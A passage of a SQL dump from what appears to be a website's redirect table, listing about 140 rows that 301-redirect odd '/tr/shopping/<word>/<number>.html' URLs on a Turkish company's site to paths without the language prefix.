00:00:00',301),(69064,'https://3s-technologies.com.tr/tr/shopping/faultful/589118136.html',NULL,'https://3s-technologies.com.tr/shopping/faultful/589118136.html','',1,0,'2026-06-11 00:47:31','0000-00-00 00:00:00',301),(69065,'https://3s-technologies.com.tr/tr/shopping/manicuring/1588227491.html',NULL,'https://3s-technologies.com.tr/shopping/manicuring/1588227491.html','',1,0,'2026-06-11 00:47:34','0000-00-00 00:00:00',301),(69066,'https://3s-technologies.com.tr/tr/shopping/planteating/2676432705.html',NULL,'https://3s-technologies.com.tr/shopping/planteating/2676432705.html','',1,0,'2026-06-11 00:47:37','0000-00-00 00:00:00',301),(69067,'https://3s-technologies.com.tr/tr/shopping/fardage/700722397.html',NULL,'https://3s-technologies.com.tr/shopping/fardage/700722397.html','',1,0,'2026-06-11 00:47:40','0000-00-00 00:00:00',301),(69068,'https://3s-technologies.com.tr/tr/shopping/achieve/554179814.html',NULL,'https://3s-technologies.com.tr/shopping/achieve/554179814.html','',1,0,'2026-06-11 00:47:43','0000-00-00 00:00:00',301),(69069,'https://3s-technologies.com.tr/tr/shopping/whitecollar/3977362898.html',NULL,'https://3s-technologies.com.tr/shopping/whitecollar/3977362898.html','',1,0,'2026-06-11 00:47:46','0000-00-00 00:00:00',301),(69070,'https://3s-technologies.com.tr/tr/shopping/suppled/3002252918.html',NULL,'https://3s-technologies.com.tr/shopping/suppled/3002252918.html','',1,0,'2026-06-11 00:47:49','0000-00-00 00:00:00',301),(69071,'https://3s-technologies.com.tr/tr/shopping/dreariment/2334969367.html',NULL,'https://3s-technologies.com.tr/shopping/dreariment/2334969367.html','',1,0,'2026-06-11 00:47:57','0000-00-00 00:00:00',301),(69072,'https://3s-technologies.com.tr/tr/shopping/exserted/3431745009.html',NULL,'https://3s-technologies.com.tr/shopping/exserted/3431745009.html','',1,0,'2026-06-11 00:48:00','0000-00-00 00:00:00',301),(69073,'https://3s-technologies.com.tr/tr/shopping/escaladed/2566746540.html',NULL,'https://3s-technologies.com.tr/shopping/escaladed/2566746540.html','',1,0,'2026-06-11 00:48:03','0000-00-00 00:00:00',301),(69074,'https://3s-technologies.com.tr/tr/shopping/chessman/2210879507.html',NULL,'https://3s-technologies.com.tr/shopping/chessman/2210879507.html','',1,0,'2026-06-11 00:48:06','0000-00-00 00:00:00',301),(69075,'https://3s-technologies.com.tr/tr/shopping/voyageable/572910490.html',NULL,'https://3s-technologies.com.tr/shopping/voyageable/572910490.html','',1,0,'2026-06-11 00:48:09','0000-00-00 00:00:00',301),(69076,'https://3s-technologies.com.tr/tr/shopping/quackle/4119153154.html',NULL,'https://3s-technologies.com.tr/shopping/quackle/4119153154.html','',1,0,'2026-06-11 00:48:12','0000-00-00 00:00:00',301),(69077,'https://3s-technologies.com.tr/tr/shopping/atelier/2935978446.html',NULL,'https://3s-technologies.com.tr/shopping/atelier/2935978446.html','',1,0,'2026-06-11 00:48:15','0000-00-00 00:00:00',301),(69078,'https://3s-technologies.com.tr/tr/shopping/chappy/4018382742.html',NULL,'https://3s-technologies.com.tr/shopping/chappy/4018382742.html','',1,0,'2026-06-11 00:48:18','0000-00-00 00:00:00',301),(69079,'https://3s-technologies.com.tr/tr/shopping/trabu/2501701219.html',NULL,'https://3s-technologies.com.tr/shopping/trabu/2501701219.html','',1,0,'2026-06-11 00:48:21','0000-00-00 00:00:00',301),(69080,'https://3s-technologies.com.tr/tr/shopping/dronishness/2535854532.html',NULL,'https://3s-technologies.com.tr/shopping/dronishness/2535854532.html','',1,0,'2026-06-11 00:48:30','0000-00-00 00:00:00',301),(69081,'https://3s-technologies.com.tr/tr/shopping/approof/2549897588.html',NULL,'https://3s-technologies.com.tr/shopping/approof/2549897588.html','',1,0,'2026-06-11 00:48:32','0000-00-00 00:00:00',301),(69082,'https://3s-technologies.com.tr/tr/shopping/salin/3731514855.html',NULL,'https://3s-technologies.com.tr/shopping/salin/3731514855.html','',1,0,'2026-06-11 00:48:35','0000-00-00 00:00:00',301),(69083,'https://3s-technologies.com.tr/tr/shopping/millennialist/816306505.html',NULL,'https://3s-technologies.com.tr/shopping/millennialist/816306505.html','',1,0,'2026-06-11 00:48:38','0000-00-00 00:00:00',301),(69084,'https://3s-technologies.com.tr/tr/shopping/bakehouse/632446826.html',NULL,'https://3s-technologies.com.tr/shopping/bakehouse/632446826.html','',1,0,'2026-06-11 00:48:41','0000-00-00 00:00:00',301),(69085,'https://3s-technologies.com.tr/tr/shopping/nitrobacteriaceae/4293603957.html',NULL,'https://3s-technologies.com.tr/shopping/nitrobacteriaceae/4293603957.html','',1,0,'2026-06-11 00:48:44','0000-00-00 00:00:00',301),(69086,'https://3s-technologies.com.tr/tr/shopping/allotropic/1688481499.html',NULL,'https://3s-technologies.com.tr/shopping/allotropic/1688481499.html','',1,0,'2026-06-11 00:48:47','0000-00-00 00:00:00',301),(69087,'https://3s-technologies.com.tr/tr/shopping/jacobinism/623941106.html',NULL,'https://3s-technologies.com.tr/shopping/jacobinism/623941106.html','',1,0,'2026-06-11 00:48:50','0000-00-00 00:00:00',301),(69088,'https://3s-technologies.com.tr/tr/shopping/overred/1275363121.html',NULL,'https://3s-technologies.com.tr/shopping/overred/1275363121.html','',1,0,'2026-06-11 00:48:53','0000-00-00 00:00:00',301),(69089,'https://3s-technologies.com.tr/tr/shopping/bepelt/857326381.html',NULL,'https://3s-technologies.com.tr/shopping/bepelt/857326381.html','',1,0,'2026-06-11 00:49:00','0000-00-00 00:00:00',301),(69090,'https://3s-technologies.com.tr/tr/shopping/highfinished/3194845560.html',NULL,'https://3s-technologies.com.tr/shopping/highfinished/3194845560.html','',1,0,'2026-06-11 00:49:02','0000-00-00 00:00:00',301),(69091,'https://3s-technologies.com.tr/tr/shopping/ringsail/1576673340.html',NULL,'https://3s-technologies.com.tr/shopping/ringsail/1576673340.html','',1,0,'2026-06-11 00:49:05','0000-00-00 00:00:00',301),(69092,'https://3s-technologies.com.tr/tr/shopping/endamageable/3905060280.html',NULL,'https://3s-technologies.com.tr/shopping/endamageable/3905060280.html','',1,0,'2026-06-11 00:49:08','0000-00-00 00:00:00',301),(69093,'https://3s-technologies.com.tr/tr/shopping/greenness/1918490069.html',NULL,'https://3s-technologies.com.tr/shopping/greenness/1918490069.html','',1,0,'2026-06-11 00:49:11','0000-00-00 00:00:00',301),(69094,'https://3s-technologies.com.tr/tr/shopping/covenant/2761527627.html',NULL,'https://3s-technologies.com.tr/shopping/covenant/2761527627.html','',1,0,'2026-06-11 00:49:14','0000-00-00 00:00:00',301),(69095,'https://3s-technologies.com.tr/tr/shopping/obesus/2287608361.html',NULL,'https://3s-technologies.com.tr/shopping/obesus/2287608361.html','',1,0,'2026-06-11 00:49:17','0000-00-00 00:00:00',301),(69096,'https://3s-technologies.com.tr/tr/shopping/myodes/3624273947.html',NULL,'https://3s-technologies.com.tr/shopping/myodes/3624273947.html','',1,0,'2026-06-11 00:49:20','0000-00-00 00:00:00',301),(69097,'https://3s-technologies.com.tr/tr/shopping/monstrosity/3287185213.html',NULL,'https://3s-technologies.com.tr/shopping/monstrosity/3287185213.html','',1,0,'2026-06-11 00:49:23','0000-00-00 00:00:00',301),(69098,'https://3s-technologies.com.tr/tr/shopping/stell/1509236202.html',NULL,'https://3s-technologies.com.tr/shopping/stell/1509236202.html','',1,0,'2026-06-11 00:49:30','0000-00-00 00:00:00',301),(69099,'https://3s-technologies.com.tr/tr/shopping/fondle/1724749032.html',NULL,'https://3s-technologies.com.tr/shopping/fondle/1724749032.html','',1,0,'2026-06-11 00:49:32','0000-00-00 00:00:00',301),(69100,'https://3s-technologies.com.tr/tr/shopping/snowflight/353825083.html',NULL,'https://3s-technologies.com.tr/shopping/snowflight/353825083.html','',1,0,'2026-06-11 00:49:35','0000-00-00 00:00:00',301),(69101,'https://3s-technologies.com.tr/tr/shopping/unconcludingness/97235712.html',NULL,'https://3s-technologies.com.tr/shopping/unconcludingness/97235712.html','',1,0,'2026-06-11 00:49:38','0000-00-00 00:00:00',301),(69102,'https://3s-technologies.com.tr/tr/shopping/woolert/1324771573.html',NULL,'https://3s-technologies.com.tr/shopping/woolert/1324771573.html','',1,0,'2026-06-11 00:49:41','0000-00-00 00:00:00',301),(69103,'https://3s-technologies.com.tr/tr/shopping/fumetere/3419257634.html',NULL,'https://3s-technologies.com.tr/shopping/fumetere/3419257634.html','',1,0,'2026-06-11 00:49:44','0000-00-00 00:00:00',301),(69104,'https://3s-technologies.com.tr/tr/shopping/pigheadedness/902769307.html',NULL,'https://3s-technologies.com.tr/shopping/pigheadedness/902769307.html','',1,0,'2026-06-11 00:49:47','0000-00-00 00:00:00',301),(69105,'https://3s-technologies.com.tr/tr/shopping/intradermal/4032640014.html',NULL,'https://3s-technologies.com.tr/shopping/intradermal/4032640014.html','',1,0,'2026-06-11 00:49:50','0000-00-00 00:00:00',301),(69106,'https://3s-technologies.com.tr/tr/shopping/monozoic/2557028705.html',NULL,'https://3s-technologies.com.tr/shopping/monozoic/2557028705.html','',1,0,'2026-06-11 00:49:53','0000-00-00 00:00:00',301),(69107,'https://3s-technologies.com.tr/tr/shopping/addlepate/1479657356.html',NULL,'https://3s-technologies.com.tr/shopping/addlepate/1479657356.html','',1,0,'2026-06-11 00:50:11','0000-00-00 00:00:00',301),(69108,'https://3s-technologies.com.tr/tr/shopping/shored/1394259243.html',NULL,'https://3s-technologies.com.tr/shopping/shored/1394259243.html','',1,0,'2026-06-11 00:50:14','0000-00-00 00:00:00',301),(69109,'https://3s-technologies.com.tr/tr/shopping/licour/2215696525.html',NULL,'https://3s-technologies.com.tr/shopping/licour/2215696525.html','',1,0,'2026-06-11 00:50:17','0000-00-00 00:00:00',301),(69110,'https://3s-technologies.com.tr/tr/shopping/discuss/981696892.html',NULL,'https://3s-technologies.com.tr/shopping/discuss/981696892.html','',1,0,'2026-06-11 00:50:20','0000-00-00 00:00:00',301),(69111,'https://3s-technologies.com.tr/tr/shopping/osteo/2061655963.html',NULL,'https://3s-technologies.com.tr/shopping/osteo/2061655963.html','',1,0,'2026-06-11 00:50:23','0000-00-00 00:00:00',301),(69112,'https://3s-technologies.com.tr/tr/shopping/shakings/2136123139.html',NULL,'https://3s-technologies.com.tr/shopping/shakings/2136123139.html','',1,0,'2026-06-11 00:50:26','0000-00-00 00:00:00',301),(69113,'https://3s-technologies.com.tr/tr/shopping/adequate/4076134410.html',NULL,'https://3s-technologies.com.tr/shopping/adequate/4076134410.html','',1,0,'2026-06-11 00:50:29','0000-00-00 00:00:00',301),(69114,'https://3s-technologies.com.tr/tr/shopping/inclamation/2063820537.html',NULL,'https://3s-technologies.com.tr/shopping/inclamation/2063820537.html','',1,0,'2026-06-11 00:50:32','0000-00-00 00:00:00',301),(69115,'https://3s-technologies.com.tr/tr/shopping/fulldrive/2866117110.html',NULL,'https://3s-technologies.com.tr/shopping/fulldrive/2866117110.html','',1,0,'2026-06-11 00:50:35','0000-00-00 00:00:00',301),(69116,'https://3s-technologies.com.tr/tr/shopping/forested/2304356266.html',NULL,'https://3s-technologies.com.tr/shopping/forested/2304356266.html','',1,0,'2026-06-11 00:50:44','0000-00-00 00:00:00',301),(69117,'https://3s-technologies.com.tr/tr/shopping/fasciculi/3212428844.html',NULL,'https://3s-technologies.com.tr/shopping/fasciculi/3212428844.html','',1,0,'2026-06-11 00:50:47','0000-00-00 00:00:00',301),(69118,'https://3s-technologies.com.tr/tr/shopping/doormat/2874622862.html',NULL,'https://3s-technologies.com.tr/shopping/doormat/2874622862.html','',1,0,'2026-06-11 00:51:17','0000-00-00 00:00:00',301),(69119,'https://3s-technologies.com.tr/tr/shopping/retreated/3129573028.html',NULL,'https://3s-technologies.com.tr/shopping/retreated/3129573028.html','',1,0,'2026-06-11 00:51:21','0000-00-00 00:00:00',301),(69120,'https://3s-technologies.com.tr/tr/shopping/wager/1506648497.html',NULL,'https://3s-technologies.com.tr/shopping/wager/1506648497.html','',1,0,'2026-06-11 00:51:25','0000-00-00 00:00:00',301),(69121,'https://3s-technologies.com.tr/tr/shopping/sahlite/2279265161.html',NULL,'https://3s-technologies.com.tr/shopping/sahlite/2279265161.html','',1,0,'2026-06-11 00:51:28','0000-00-00 00:00:00',301),(69122,'https://3s-technologies.com.tr/tr/shopping/carpet/2664550264.html',NULL,'https://3s-technologies.com.tr/shopping/carpet/2664550264.html','',1,0,'2026-06-11 00:51:31','0000-00-00 00:00:00',301),(69123,'https://3s-technologies.com.tr/tr/shopping/crayfish/3026195644.html',NULL,'https://3s-technologies.com.tr/shopping/crayfish/3026195644.html','',1,0,'2026-06-11 00:51:34','0000-00-00 00:00:00',301),(69124,'https://3s-technologies.com.tr/tr/shopping/turtling/3224828644.html',NULL,'https://3s-technologies.com.tr/shopping/turtling/3224828644.html','',1,0,'2026-06-11 00:51:41','0000-00-00 00:00:00',301),(69125,'https://3s-technologies.com.tr/tr/shopping/examper/4150714771.html',NULL,'https://3s-technologies.com.tr/shopping/examper/4150714771.html','',1,0,'2026-06-11 00:51:43','0000-00-00 00:00:00',301),(69126,'https://3s-technologies.com.tr/tr/shopping/illuming/3329645370.html',NULL,'https://3s-technologies.com.tr/shopping/illuming/3329645370.html','',1,0,'2026-06-11 00:51:46','0000-00-00 00:00:00',301),(69127,'https://3s-technologies.com.tr/tr/shopping/sebic/1638727673.html',NULL,'https://3s-technologies.com.tr/shopping/sebic/1638727673.html','',1,0,'2026-06-11 00:51:49','0000-00-00 00:00:00',301),(69128,'https://3s-technologies.com.tr/tr/shopping/doorplane/2924213149.html',NULL,'https://3s-technologies.com.tr/shopping/doorplane/2924213149.html','',1,0,'2026-06-11 00:51:52','0000-00-00 00:00:00',301),(69129,'https://3s-technologies.com.tr/tr/shopping/oaring/3279891560.html',NULL,'https://3s-technologies.com.tr/shopping/oaring/3279891560.html','',1,0,'2026-06-11 00:51:55','0000-00-00 00:00:00',301),(69130,'https://3s-technologies.com.tr/tr/shopping/drover/2297326196.html',NULL,'https://3s-technologies.com.tr/shopping/drover/2297326196.html','',1,0,'2026-06-11 00:51:58','0000-00-00 00:00:00',301),(69131,'https://3s-technologies.com.tr/tr/shopping/hydrogenous/674892985.html',NULL,'https://3s-technologies.com.tr/shopping/hydrogenous/674892985.html','',1,0,'2026-06-11 00:52:01','0000-00-00 00:00:00',301),(69132,'https://3s-technologies.com.tr/tr/shopping/bocal/2486165413.html',NULL,'https://3s-technologies.com.tr/shopping/bocal/2486165413.html','',1,0,'2026-06-11 00:52:04','0000-00-00 00:00:00',301),(69133,'https://3s-technologies.com.tr/tr/shopping/mathematician/3704705549.html',NULL,'https://3s-technologies.com.tr/shopping/mathematician/3704705549.html','',1,0,'2026-06-11 00:52:07','0000-00-00 00:00:00',301),(69134,'https://3s-technologies.com.tr/tr/shopping/acritude/2352880909.html',NULL,'https://3s-technologies.com.tr/shopping/acritude/2352880909.html','',1,0,'2026-06-11 00:52:10','0000-00-00 00:00:00',301),(69135,'https://3s-technologies.com.tr/tr/shopping/malacozoic/2070997046.html',NULL,'https://3s-technologies.com.tr/shopping/malacozoic/2070997046.html','',1,0,'2026-06-11 00:52:13','0000-00-00 00:00:00',301),(69136,'https://3s-technologies.com.tr/tr/shopping/tricornigerous/697345708.html',NULL,'https://3s-technologies.com.tr/shopping/tricornigerous/697345708.html','',1,0,'2026-06-11 00:52:16','0000-00-00 00:00:00',301),(69137,'https://3s-technologies.com.tr/tr/shopping/demonologist/1749840137.html',NULL,'https://3s-technologies.com.tr/shopping/demonologist/1749840137.html','',1,0,'2026-06-11 00:52:19','0000-00-00 00:00:00',301),(69138,'https://3s-technologies.com.tr/tr/shopping/weighmaster/380684743.html',NULL,'https://3s-technologies.com.tr/shopping/weighmaster/380684743.html','',1,0,'2026-06-11 00:52:22','0000-00-00 00:00:00',301),(69139,'https://3s-technologies.com.tr/tr/shopping/bibbler/2109409918.html',NULL,'https://3s-technologies.com.tr/shopping/bibbler/2109409918.html','',1,0,'2026-06-11 00:52:25','0000-00-00 00:00:00',301),(69140,'https://3s-technologies.com.tr/tr/shopping/iodate/3614437997.html',NULL,'https://3s-technologies.com.tr/shopping/iodate/3614437997.html','',1,0,'2026-06-11 00:52:28','0000-00-00 00:00:00',301),(69141,'https://3s-technologies.com.tr/tr/shopping/flowers/15738450.html',NULL,'https://3s-technologies.com.tr/shopping/flowers/15738450.html','',1,0,'2026-06-11 00:52:31','0000-00-00 00:00:00',301),(69142,'https://3s-technologies.com.tr/tr/shopping/electrician/3856009.html',NULL,'https://3s-technologies.com.tr/shopping/electrician/3856009.html','',1,0,'2026-06-11 00:52:34','0000-00-00 00:00:00',301),(69143,'https://3s-technologies.com.tr/tr/shopping/odorine/273016729.html',NULL,'https://3s-technologies.com.tr/shopping/odorine/273016729.html','',1,0,'2026-06-11 00:52:37','0000-00-00 00:00:00',301),(69144,'https://3s-technologies.com.tr/tr/shopping/predestinative/2338509595.html',NULL,'https://3s-technologies.com.tr/shopping/predestinative/2338509595.html','',1,0,'2026-06-11 00:52:40','0000-00-00 00:00:00',301),(69145,'https://3s-technologies.com.tr/tr/shopping/blastogenesis/2119375250.html',NULL,'https://3s-technologies.com.tr/shopping/blastogenesis/2119375250.html','',1,0,'2026-06-11 00:52:45','0000-00-00 00:00:00',301),(69146,'https://3s-technologies.com.tr/tr/shopping/caudicle/446632185.html',NULL,'https://3s-technologies.com.tr/shopping/caudicle/446632185.html','',1,0,'2026-06-11 00:52:47','0000-00-00 00:00:00',301),(69147,'https://3s-technologies.com.tr/tr/shopping/disordinate/3268126263.html',NULL,'https://3s-technologies.com.tr/shopping/disordinate/3268126263.html','',1,0,'2026-06-11 00:52:50','0000-00-00 00:00:00',301),(69148,'https://3s-technologies.com.tr/tr/shopping/polewards/1708606093.html',NULL,'https://3s-technologies.com.tr/shopping/polewards/1708606093.html','',1,0,'2026-06-11 00:52:53','0000-00-00 00:00:00',301),(69149,'https://3s-technologies.com.tr/tr/shopping/youngster/753948965.html',NULL,'https://3s-technologies.com.tr/shopping/youngster/753948965.html','',1,0,'2026-06-11 00:52:56','0000-00-00 00:00:00',301),(69150,'https://3s-technologies.com.tr/tr/shopping/stoor/558932141.html',NULL,'https://3s-technologies.com.tr/shopping/stoor/558932141.html','',1,0,'2026-06-11 00:52:59','0000-00-00 00:00:00',301),(69151,'https://3s-technologies.com.tr/tr/shopping/slowest/919075769.html',NULL,'https://3s-technologies.com.tr/shopping/slowest/919075769.html','',1,0,'2026-06-11 00:53:02','0000-00-00 00:00:00',301),(69152,'https://3s-technologies.com.tr/tr/shopping/paralyzed/2028601580.html',NULL,'https://3s-technologies.com.tr/shopping/paralyzed/2028601580.html','',1,0,'2026-06-11 00:53:05','0000-00-00 00:00:00',301),(69153,'https://3s-technologies.com.tr/tr/shopping/thyrotomy/2916312363.html',NULL,'https://3s-technologies.com.tr/shopping/thyrotomy/2916312363.html','',1,0,'2026-06-11 00:53:08','0000-00-00 00:00:00',301),(69154,'https://3s-technologies.com.tr/tr/shopping/arduously/2952726351.html',NULL,'https://3s-technologies.com.tr/shopping/arduously/2952726351.html','',1,0,'2026-06-11 00:53:11','0000-00-00 00:00:00',301),(69155,'https://3s-technologies.com.tr/tr/shopping/wardsman/3942422816.html',NULL,'https://3s-technologies.com.tr/shopping/wardsman/3942422816.html','',1,0,'2026-06-11 00:53:23','0000-00-00 00:00:00',301),(69156,'https://3s-technologies.com.tr/tr/shopping/polliwog/2555816606.html',NULL,'https://3s-technologies.com.tr/shopping/polliwog/2555816606.html','',1,0,'2026-06-11 00:53:27','0000-00-00 00:00:00',301),(69157,'https://3s-technologies.com.tr/tr/shopping/gutturalism/3671258201.html',NULL,'https://3s-technologies.com.tr/shopping/gutturalism/3671258201.html','',1,0,'2026-06-11 00:53:30','0000-00-00 00:00:00',301),(69158,'https://3s-technologies.com.tr/tr/shopping/kippur/1473591915.html',NULL,'https://3s-technologies.com.tr/shopping/kippur/1473591915.html','',1,0,'2026-06-11 00:53:33','0000-00-00 00:00:00',301),(69159,'https://3s-technologies.com.tr/tr/shopping/luctual/2476382887.html',NULL,'https://3s-technologies.com.tr/shopping/luctual/2476382887.html','',1,0,'2026-06-11 00:53:36','0000-00-00 00:00:00',301),(69160,'https://3s-technologies.com.tr/tr/shopping/altaic/227407094.html',NULL,'https://3s-technologies.com.tr/shopping/altaic/227407094.html','',1,0,'2026-06-11 00:53:39','0000-00-00 00:00:00',301),(69161,'https://3s-technologies.com.tr/tr/shopping/paien/1435948728.html',NULL,'https://3s-technologies.com.tr/shopping/paien/1435948728.html','',1,0,'2026-06-11 00:53:42','0000-00-00 00:00:00',301),(69162,'https://3s-technologies.com.tr/tr/shopping/vapory/3600394941.html',NULL,'https://3s-technologies.com.tr/shopping/vapory/3600394941.html','',1,0,'2026-06-11 00:53:45','0000-00-00 00:00:00',301),(69163,'https://3s-technologies.com.tr/tr/shopping/consultive/2708020376.html',NULL,'https://3s-technologies.com.tr/shopping/consultive/2708020376.html','',1,0,'2026-06-11 00:53:48','0000-00-00 00:00:00',301),(69164,'https://3s-technologies.com.tr/tr/shopping/phantasma/2257928468.html',NULL,'https://3s-technologies.com.tr/shopping/phantasma/2257928468.html','',1,0,'2026-06-11 00:53:51','0000-00-00 00:00:00',301),(69165,'https://3s-technologies.com.tr/tr/shopping/pituite/1182817810.html',NULL,'https://3s-technologies.com.tr/shopping/pituite/1182817810.html','',1,0,'2026-06-11 00:53:54','0000-00-00 00:00:00',301),(69166,'https://3s-technologies.com.tr/tr/shopping/andrews/1373363961.html',NULL,'https://3s-technologies.com.tr/shopping/andrews/1373363961.html','',1,0,'2026-06-11 00:53:57','0000-00-00 00:00:00',301),(69167,'https://3s-technologies.com.tr/tr/shopping/hazardous/2897236329.html',NULL,'https://3s-technologies.com.tr/shopping/hazardous/2897236329.html','',1,0,'2026-06-11 00:54:00','0000-00-00 00:00:00',301),(69168,'https://3s-technologies.com.tr/tr/shopping/drabber/392140094.html',NULL,'https://3s-technologies.com.tr/shopping/drabber/392140094.html','',1,0,'2026-06-11 00:54:03','0000-00-00 00:00:00',301),(69169,'https://3s-technologies.com.tr/tr/shopping/anilide/2206010068.html',NULL,'https://3s-technologies.com.tr/shopping/anilide/2206010068.html','',1,0,'2026-06-11 00:54:06','0000-00-00 00:00:00',301),(69170,'https://3s-technologies.com.tr/tr/shopping/scraffle/91581264.html',NULL,'https://3s-technologies.com.tr/shopping/scraffle/91581264.html','',1,0,'2026-06-11 00:54:09','0000-00-00 00:00:00',301),(69171,'https://3s-technologies.com.tr/tr/shopping/hydrogenize/2751464450.html',NULL,'https://3s-technologies.com.tr/shopping/hydrogenize/2751464450.html','',1,0,'2026-06-11 00:54:12','0000-00-00 00:00:00',301),(69172,'https://3s-technologies.com.tr/tr/shopping/bagel/915422388.html',NULL,'https://3s-technologies.com.tr/shopping/bagel/915422388.html','',1,0,'2026-06-11 00:54:15','0000-00-00 00:00:00',301),(69173,'https://3s-technologies.com.tr/tr/shopping/panicle/3931869618.html',NULL,'https://3s-technologies.com.tr/shopping/panicle/3931869618.html','',1,0,'2026-06-11 00:54:18','0000-00-00 00:00:00',301),(69174,'https://3s-technologies.com.tr/tr/shopping/hards/3839062484.html',NULL,'https://3s-technologies.com.tr/shopping/hards/3839062484.html','',1,0,'2026-06-11 00:54:21','0000-00-00 00:00:00',301),(69175,'https://3s-technologies.com.tr/tr/shopping/degenerously/2820344955.html',NULL,'https://3s-technologies.com.tr/shopping/degenerously/2820344955.html','',1,0,'2026-06-11 00:54:24','0000-00-00 00:00:00',301),(69176,'https://3s-technologies.com.tr/tr/shopping/middleoftheroader/3401837889.html',NULL,'https://3s-technologies.com.tr/shopping/middleoftheroader/3401837889.html','',1,0,'2026-06-11 00:54:27','0000-00-00 00:00:00',301),(69177,'https://3s-technologies.com.tr/tr/shopping/acolyte/2625695010.html',NULL,'https://3s-technologies.com.tr/shopping/acolyte/2625695010.html','',1,0,'2026-06-11 00:54:30','0000-00-00 00:00:00',301),(69178,'https://3s-technologies.com.tr/tr/shopping/brink/2857874957.html',NULL,'https://3s-technologies.com.tr/shopping/brink/2857874957.html','',1,0,'2026-06-11 00:54:33','0000-00-00 00:00:00',301),(69179,'https://3s-technologies.com.tr/tr/shopping/calamar/549591042.html',NULL,'https://3s-technologies.com.tr/shopping/calamar/549591042.html','',1,0,'2026-06-11 00:54:36','0000-00-00 00:00:00',301),(69180,'https://3s-technologies.com.tr/tr/shopping/radish/3160855770.html',NULL,'https://3s-technologies.com.tr/shopping/radish/3160855770.html','',1,0,'2026-06-11 00:54:38','0000-00-00 00:00:00',301),(69181,'https://3s-technologies.com.tr/tr/shopping/vinegarette/2177825124.html',NULL,'https://3s-technologies.com.tr/shopping/vinegarette/2177825124.html','',1,0,'2026-06-11 00:54:47','0000-00-00 00:00:00',301),(69182,'https://3s-technologies.com.tr/tr/shopping/possessioner/2488870262.html',NULL,'https://3s-technologies.com.tr/shopping/possessioner/2488870262.html','',1,0,'2026-06-11 00:54:52','0000-00-00 00:00:00',301),(69183,'https://3s-technologies.com.tr/tr/shopping/skunktop/3681811399.html',NULL,'https://3s-technologies.com.tr/shopping/skunktop/3681811399.html','',1,0,'2026-06-11 00:54:55','0000-00-00 00:00:00',301),(69184,'https://3s-technologies.com.tr/tr/shopping/augurer/487109587.html',NULL,'https://3s-technologies.com.tr/shopping/augurer/487109587.html','',1,0,'2026-06-11 00:54:58','0000-00-00 00:00:00',301),(69185,'https://3s-technologies.com.tr/tr/shopping/inarch/4098865037.html',NULL,'https://3s-technologies.com.tr/shopping/inarch/4098865037.html','',1,0,'2026-06-11 00:55:00','0000-00-00 00:00:00',301),(69186,'https://3s-technologies.com.tr/tr/shopping/ambled/2897399868.html',NULL,'https://3s-technologies.com.tr/shopping/ambled/2897399868.html','',1,0,'2026-06-11 00:55:03','0000-00-00 00:00:00',301),(69187,'https://3s-technologies.com.tr/tr/shopping/dedalian/859750563.html',NULL,'https://3s-technologies.com.tr/shopping/dedalian/859750563.html','',1,0,'2026-06-11 00:55:06','0000-00-00 00:00:00',301),(69188,'https://3s-technologies.com.tr/tr/shopping/saturnian/3389791925.html',NULL,'https://3s-technologies.com.tr/shopping/saturnian/3389791925.html','',1,0,'2026-06-11 00:55:09','0000-00-00 00:00:00',301),(69189,'https://3s-technologies.com.tr/tr/shopping/deserter/2464764045.html',NULL,'https://3s-technologies.com.tr/shopping/deserter/2464764045.html','',1,0,'2026-06-11 00:55:12','0000-00-00 00:00:00',301),(69190,'https://3s-technologies.com.tr/tr/shopping/wouldingness/1539589711.html',NULL,'https://3s-technologies.com.tr/shopping/wouldingness/1539589711.html','',1,0,'2026-06-11 00:55:16','0000-00-00 00:00:00',301),(69191,'https://3s-technologies.com.tr/tr/shopping/ingrapple/852737577.html',NULL,'https://3s-technologies.com.tr/shopping/ingrapple/852737577.html','',1,0,'2026-06-11 00:55:18','0000-00-00 00:00:00',301),(69192,'https://3s-technologies.com.tr/tr/shopping/abeyancy/3494102533.html',NULL,'https://3s-technologies.com.tr/shopping/abeyancy/3494102533.html','',1,0,'2026-06-11 00:55:21','0000-00-00 00:00:00',301),(69193,'https://3s-technologies.com.tr/tr/shopping/bevelling/3254407522.html',NULL,'https://3s-technologies.com.tr/shopping/bevelling/3254407522.html','',1,0,'2026-06-11 00:55:25','0000-00-00 00:00:00',301),(69194,'https://3s-technologies.com.tr/tr/shopping/gallature/1094485422.html',NULL,'https://3s-technologies.com.tr/shopping/gallature/1094485422.html','',1,0,'2026-06-11 00:55:27','0000-00-00 00:00:00',301),(69195,'https://3s-technologies.com.tr/tr/shopping/bowne/1794546648.html',NULL,'https://3s-technologies.com.tr/shopping/bowne/1794546648.html','',1,0,'2026-06-11 00:55:30','0000-00-00 00:00:00',301),(69196,'https://3s-technologies.com.tr/tr/shopping/withstander/579940576.html',NULL,'https://3s-technologies.com.tr/shopping/withstander/579940576.html','',1,0,'2026-06-11 00:55:33','0000-00-00 00:00:00',301),(69197,'https://3s-technologies.com.tr/tr/shopping/maslin/1006293130.html',NULL,'https://3s-technologies.com.tr/shopping/maslin/1006293130.html','',1,0,'2026-06-11 00:55:36','0000-00-00 00:00:00',301),(69198,'https://3s-technologies.com.tr/tr/shopping/delitescency/1304828814.html',NULL,'https://3s-technologies.com.tr/shopping/delitescency/1304828814.html','',1,0,'2026-06-11 00:55:40','0000-00-00 00:00:00',301),(69199,'https://3s-technologies.com.tr/tr/shopping/oscilloscope/58133932.html',NULL,'https://3s-technologies.com.tr/shopping/oscilloscope/58133932.html','',1,0,'2026-06-11 00:55:43','0000-00-00 00:00:00',301),(69200,'https://3s-technologies.com.tr/tr/shopping/chapelet/179799578.html',NULL,'https://3s-technologies.com.tr/shopping/chapelet/179799578.html','',1,0,'2026-06-11 00:55:46','0000-00-00 00:00:00',301),(69201,'https://3s-technologies.com.tr/tr/shopping/unface/3237659617.html',NULL,'https://3s-technologies.com.tr/shopping/unface/3237659617.html','',1,0,'2026-06-11 00:55:48','0000-00-00 00:00:00',301),(69202,'https://3s-technologies.com.tr/tr/shopping/hexagrammos/1290618260.html',NULL,'https://3s-technologies.com.tr/shopping/hexagrammos/1290618260.html','',1,0,'2026-06-11 00:55:52','0000-00-00 00:00:00',301),(69203,'https://3s-technologies.com.tr/tr/shopping/perisoreus/694640859.html',NULL,'https://3s-technologies.com.tr/shopping/perisoreus/694640859.html','',1,0,'2026-06-11 00:55:55','0000-00-00 00:00:00',301),(69204,'https://3s-technologies.com.tr/tr/shopping/overcare/1837565392.html',NULL,'https://3s-technologies.com.tr/shopping/overcare/1837565392.html','',1,0,'2026-06-11 00:55:58','0000-00-00 